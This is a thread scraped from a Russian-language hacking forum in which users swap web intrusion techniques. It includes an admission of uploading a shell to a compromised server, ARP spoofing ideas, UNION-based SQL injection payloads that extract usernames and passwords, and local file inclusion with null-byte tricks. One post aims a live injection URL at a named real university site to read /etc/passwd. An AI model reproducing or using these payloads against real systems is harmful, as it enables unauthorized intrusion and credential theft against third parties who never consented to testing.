Непоможет,пробую фарма сайты.1-Они на выделенных серверах(большинство).2.Был один бажный сайтих на одном серве,через него залил шелл и обломился-такие сервы постоянно обновляются,то бишь эксплойты отпадают.
Но за ответ спасибо,действительно способ хороший. Обратить внимание на соседей по хостингу (потребуется рут на дедике). Когдато (возможно и сейчас), к примеру, сети агавы были уязвимы к ARP спуфингу.

Если mysql_real_escape_string() или addslashes(), то у тебя не чего неполучится :(
MySQL какую кодировку использует?
но почему же?
echo addslashes(eval($_GET[a]));

Всё разобрался :)

забыл:
mysql_fetch_assoc($sql)
+ в $sql будет массив , индексы которого - имена полей в таблице.
>>А тут придётся играть с ковычками
понту с тех ковычек? они мешать не будут.
>>То да, здесь addslashes() не поможет.
точно?
echo addslashes(eval($_GET[a]));
SeNaP не пиши муть

Подскажите возможные пути к httpd.conf апача, не могу найти и все тут.

Подскажите возможные пути к httpd.conf апача, не могу найти и все тут.
https://forum.antichat.ru/thread49775.html

Нашёл инъекцию, но после запроса select в скрипте идет запрос update и вылетает ошибка синтаксиса с запросом:

SELECT * FROM news WHERE type='show' AND id=-32 union select 1,2,3,4,5,6,7,8,9,10 from users
UPDATE news SET count='33' WHERE id=-32 union select 1,2,3,4,5,6,7,8,9,10 from users

поле id обрабатывается функцией addslash() и into output не прокатит. Подскажите, как можно посмотреть данные минуя ошибку.

YoriK
SELECT * FROM news WHERE type='show' AND id=32 and 2=1 union select 1,2,3,4,5,6,7,8,9,1100 from users%23
index.php?module=news&action=details&item_id=3+and+2=1+UNION+SELECT+1,2,3,4,5,6,7,8,9,c oncat_ws(0x3a,username,password)+from+tcms_users%2 3
почему не канает?

10 колонок, после апдейта вывод в 10

Если в уязвимом скрипте идёт инклуд типа
include("pages/$_GET[act].php");

То можно провести внешний инклуд?

нет

нет
А что можно полезного тогда получить из него если на машине Линукс?

А что можно полезного тогда получить из него если на машине Линукс?
https://forum.antichat.ru/thread12123.html

А что можно полезного тогда получить из него если на машине Линукс?
Всё то же самое что и при удаленном. Просто потребуется немного больше времени и немного больше навыков.

тут нормальная не блайнд инъекция
http://www.univd.edu.ua/document/index.php?id_doc=123+and+1=4+union+select+database (),2,3,4,5--+-&lan=ukr

о ептыть тут еще инклуд есть
http://www.univd.edu.ua/document/index.php?id_doc=123+and+1=4+union+select+database (),0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F7061737 37764,3,4,5--+-&lan=ukr

Помогите с чем то , помойму инклуд , LFI вроде.. Опыта совсем нет в этом

- где imyascripta: там расширение .php добавляется само...
Можно ли что то раскрутить?
Мало информации.
А вообще можно, нулл байт тебе в руки! (%00, %0A, %0D)